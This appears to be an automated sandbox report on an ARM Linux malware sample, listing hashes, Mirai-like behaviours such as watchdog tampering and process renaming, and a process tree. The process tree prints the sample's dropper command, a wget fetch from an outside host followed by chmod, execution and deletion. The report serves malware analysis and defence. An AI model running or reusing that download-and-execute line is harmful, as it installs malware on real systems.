Analysis
-
max time kernel
147s -
max time network
140s -
platform
debian-9_armhf -
resource
debian9-armhf-20221111-en -
resource tags
arch:armhfimage:debian9-armhf-20221111-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
31/05/2023, 01:18
Behavioral task
behavioral1
Sample
7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf
Resource
debian9-armhf-20221111-en
General
-
Target
7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf
-
Size
139KB
-
MD5
3f873257c444500f6545a64d98033589
-
SHA1
0f071b87e35fe8509d4e4e32ee06b7190e6ac1db
-
SHA256
7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a
-
SHA512
10af1ce8e04857a1ba3df8aa736e5a851641bc1f0b37405ee93e071961218b37e594db7a3ad6df01e718984b9b213b7eb3d699f610ed343600cb320423beaa11
-
SSDEEP
3072:Z41HOuaGVV3NfHUOjqyljqCw3jkmhxQwoVZUNu:Ze3aGVVdqyljq1jkmhxQwoVZUNu
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /usr/sbin/dropbear 367 7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 378 Process not Found -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route 7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route 7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf/tmp/7448ffe45565ac89bac6bfb853f814e3a08869bec4ad6479fe4282c835e0a50a.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:367 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:368
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:372
-
-
/bin/chmodchmod 777 .....3⤵PID:377
-
-
/tmp/....../.....3⤵PID:378
-
-
/bin/sh/bin/sh ./.....3⤵PID:378
-
-
/bin/rmrm -rf .....3⤵PID:380
-
-